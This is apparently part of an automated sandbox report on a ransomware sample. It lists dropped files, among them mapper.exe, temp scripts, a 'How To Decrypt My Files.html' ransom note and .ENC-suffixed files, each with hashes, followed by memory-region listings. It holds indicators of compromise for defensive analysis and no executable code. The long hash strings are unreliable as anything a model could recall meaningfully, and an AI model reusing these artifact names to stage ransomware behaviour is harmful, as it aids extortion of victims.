                                        ad1646c13f98e6915e51bfba9207b81f6d1d174a1437f9c1e1c935b7676451ff73a694323ff61fa72ec87b7824ce9380423533599e30d889b689e2e13887045f

                                        Download Submit

                                      • C:\Users\Admin\AppData\Local\Temp\7zOC125BAA7\mapper.exe
                                        Filesize

                                        78KB

                                        MD5

                                        919023267a38b0b6641b26319901fddf

                                        SHA1

                                        dbd25f981353ce0f824fb441a2a0dc2441bdc8da

                                        SHA256

                                        c68421f86ca419eac8bb89fcd66b860db60ed4201c16bfa4159436bbbae9401e

                                        SHA512

                                        ece9275342a3986ef2ab60e0128ca055ea7e1352c13c05367b62e1296dbf4105d757ce0181a79888f1144f14379dc15518aac87bac81da093036ba1a243bbfbf

                                        Download Submit

                                      • C:\Users\Admin\AppData\Local\Temp\RESB64E.tmp
                                        Filesize

                                        1KB

                                        MD5

                                        a4685a071692f06de1598ab7d48bf32c

                                        SHA1

                                        dab1b13d36488f6fd192a05d6a1bedc3916e7efc

                                        SHA256

                                        c5184874371625c138ecec0bc69a22e42f5b400ac9dc3fd9e60e0ed00625eec8

                                        SHA512

                                        c95617bffb7024570b3e81aba1ec4eaf16a32de72177b384c81b4c4719f98d00fdb2a899937ebea61da29ff3237c06991c7f7bebd496d6e0baf2eac41be17dea

                                        Download Submit

                                      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5hiojj2e.mjp.ps1
                                        Filesize

                                        60B

                                        MD5

                                        d17fe0a3f47be24a6453e9ef58c94641

                                        SHA1

                                        6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                        SHA256

                                        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                        SHA512

                                        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                        Download Submit

                                      • C:\Users\Admin\AppData\Local\Temp\vbcD13BC8EF3E11494C85172E965FFA2C2.TMP
                                        Filesize

                                        1KB

                                        MD5

                                        2b1d73395de772dd89111bc444da179a

                                        SHA1

                                        8743f9599f7ae813b40384ba5a29552d790e74a9

                                        SHA256

                                        a952fc786c3998d750cd33aa0c355644e615798a33a231d65402d94a8281a1a6

                                        SHA512

                                        21d5a8733e7a2ffbc39ed287bcf759ee63a2aa514f2cbfe72d047db14ee47f8a9c5db7e11476dc1e3df8452a3dc65b7cea11b35111c3878c56ae283242ed02f1

                                        Download Submit

                                      • C:\Users\Admin\AppData\Local\Temp\w45wvyr4\w45wvyr4.0.vb
                                        Filesize

                                        386B

                                        MD5

                                        156a4b3e570d9c7efc0f0094dbceb24e

                                        SHA1

                                        ccd7e470b9114884d6e958ab4d8b4c451f493c66

                                        SHA256

                                        7443a1bcd15924a389e5da2a0530b6703a35aed61e63cd1a1d7d0699d49a5a77

                                        SHA512

                                        90123975819cc2fc3030f94cc8bfce587e8c7efcca8c7ac8a1e99c5f3211c0a50fe16994836fb46fcb3a68b2157259a59f7a5928c19bba2fc3cb4059ecc8efa2

                                        Download Submit

                                      • C:\Users\Admin\AppData\Local\Temp\w45wvyr4\w45wvyr4.cmdline
                                        Filesize

                                        313B

                                        MD5

                                        751dbb5fd7ac8921d91c0e19332a8624

                                        SHA1

                                        5c790b735d019102dcd33f48d0bd6a9aa1155af6

                                        SHA256

                                        3f691e00df42ecfdcf2a63ad52b4d0ee5088f2dcd4d2d76090ab9e348134a7f0

                                        SHA512

                                        d2fadfa962296ce410414e7dfd827e943be5aefb64d5dc468c39a16bb5283a89c0132dd0c096b9671dc70a1c6e022d6bc31c5c4f4dc0aa0521113eb77e9bd8a6

                                        Download Submit

                                      • C:\Users\Admin\AppData\Local\Temp\w45wvyr4\w45wvyr4.exe
                                        Filesize

                                        6KB

                                        MD5

                                        8227cf31c732b85bbed1c99084d065dc

                                        SHA1

                                        4319660bd19a33052486fe42c6508596ee318eea

                                        SHA256

                                        a320ff23d99e60674e676cb6b6d5c2a8e278c1b47eaeb8884e4cf411ccf80ca7

                                        SHA512

                                        e3ec1bc1e5a1be5590f1198312ff660f2a156bc6a5a7118b508a95e065fda4a625b5c58d2352961627e51ca6f0f713efb603cf3c2dbcfdbbe07c19594f445840

                                        Download Submit

                                      • C:\Users\Admin\Desktop\How To Decrypt My Files.html
                                        Filesize

                                        634B

                                        MD5

                                        64874e5ec200a248198f20e134aee323

                                        SHA1

                                        ee825efdceba5aa3469fa90395bb75d85195cdf3

                                        SHA256

                                        c22d02d7af8cd46842a4b460eeb0af8c06686ff1818bed037f2dc7cf858990c7

                                        SHA512

                                        c46a7af296aae0b53737ec1e4067f2b6b7ff0b1ebe2cd930c01a4a02db3c0d221564520ccb02de28642e81758be44a2a6e33ec8ebe09ff9832242d3d23a8cce9

                                        Download Submit

                                      • C:\Users\Admin\NTUSER.DAT{2fa72cf3-34ca-11ed-acae-cbf1edc82a99}.TMContainer00000000000000000001.regtrans-ms.ENC
                                        Filesize

                                        16B

                                        MD5

                                        de8d470801edaba51db074c760f40113

                                        SHA1

                                        d40b5599089ac50895d00bfe06e7775bbc742c56

                                        SHA256

                                        08ca2b6258ce3681c759189d76f06b98d72ac8f4931af1b892b2edde90b7264b

                                        SHA512

                                        93f0dbb8ba622e826307c51972d4cda906d29918777f285cb06941f01ff41794631cb24f5a33496fc85c049a84329b36999e24846153cfbc443fae684cbe3d83

                                        Download Submit

                                      • memory/1140-14-0x000001E04C060000-0x000001E04C082000-memory.dmp

                                        Filesize

                                        136KB

                                        Download

                                      • memory/2220-116-0x0000000005310000-0x0000000005376000-memory.dmp

                                        Filesize

                                        408KB

                                        Download

                                      • memory/2220-115-0x0000000005740000-0x0000000005CE6000-memory.dmp

                                        Filesize

                                        5.6MB

                                        Download

                                      • memory/2220-114-0x00000000050F0000-0x000000000518C000-memory.dmp

                                        Filesize

                                        624KB

                                        Download

                                      • memory/2220-113-0x0000000005050000-0x00000000050E2000-memory.dmp

                                        Filesize

                                        584KB

                                        Download

                                      • memory/2220-112-0x00000000003D0000-0x00000000003E0000-memory.dmp

                                        Filesize

                                        64KB

                                        Download

                                      • memory/3364-93-0x0000000001050000-0x000000000105C000-memory.dmp

                                        Filesize

                                        48KB

                                        Download

                                      • memory/3364-85-0x00007FFF84F10000-0x00007FFF859D2000-memory.dmp

                                        Filesize

                                        10.8MB

                                        Download

                                      • memory/3364-494-0x000000001C6D0000-0x000000001C6DA000-memory.dmp

                                        Filesize

                                        40KB

                                        Download

                                      • memory/3364-493-0x000000001BCD0000-0x000000001BCDA000-memory.dmp

                                        Filesize

                                        40KB

                                        Download

                                      • memory/3364-12-0x00007FFF84F13000-0x00007FFF84F15000-memory.dmp

                                        Filesize

                                        8KB

                                        Download

                                      • memory/3364-13-0x0000000000990000-0x00000000009AA000-memory.dmp

                                        Filesize

                                        104KB

                                        Download

                                      • memory/3364-472-0x000000001BBE0000-0x000000001BBE8000-memory.dmp

                                        Filesize

                                        32KB

                                        Download

                                      • memory/3364-60-0x00007FFF84F10000-0x00007FFF859D2000-memory.dmp

                                        Filesize

                                        10.8MB

                                        Download

                                      • memory/3364-67-0x00007FFF84F13000-0x00007FFF84F15000-memory.dmp

                                        Filesize

                                        8KB

                                        Download

                                      • memory/3364-110-0x000000001C340000-0x000000001C356000-memory.dmp

                                        Filesize

                                        88KB

                                        Download

                                      • memory/3364-98-0x000000001B7C0000-0x000000001B7CE000-memory.dmp

                                        Filesize

                                        56KB

                                        Download

                                      • memory/3364-97-0x000000001F6D0000-0x000000001F88A000-memory.dmp

                                        Filesize

                                        1.7MB

                                        Download

                                      • memory/3364-417-0x000000001D1A0000-0x000000001D2BE000-memory.dmp

                                        Filesize

                                        1.1MB

                                        Download

                                      • memory/3364-96-0x00000000010E0000-0x00000000010EC000-memory.dmp

                                        Filesize

                                        48KB

                                        Download

                                      • memory/3364-457-0x000000001C6B0000-0x000000001C6BA000-memory.dmp

                                        Filesize

                                        40KB

                                        Download

                                      • memory/3364-94-0x00000000010D0000-0x00000000010D8000-memory.dmp

                                        Filesize

                                        32KB

                                        Download

                                      • memory/3364-139-0x000000001C350000-0x000000001C35C000-memory.dmp

                                        Filesize

                                        48KB

                                        Download

                                      • memory/4972-117-0x0000000002FD0000-0x0000000003006000-memory.dmp

                                        Filesize

                                        216KB

                                        Download

                                      • memory/4972-118-0x00000000058C0000-0x0000000005EEA000-memory.dmp

                                        Filesize

                                        6.2MB

                                        Download

                                      • memory/4972-119-0x00000000055D0000-0x00000000055F2000-memory.dmp

                                        Filesize

                                        136KB

                                        Download

                                      • memory/4972-120-0x0000000005670000-0x00000000056D6000-memory.dmp

                                        Filesize

                                        408KB

                                        Download

                                      • memory/4972-129-0x0000000005FF0000-0x0000000006347000-memory.dmp

                                        Filesize

                                        3.3MB

                                        Download

                                      • memory/4972-131-0x0000000006490000-0x00000000064AE000-memory.dmp

                                        Filesize

                                        120KB

                                        Download

                                      • memory/4972-132-0x0000000006520000-0x000000000656C000-memory.dmp

                                        Filesize

                                        304KB

                                        Download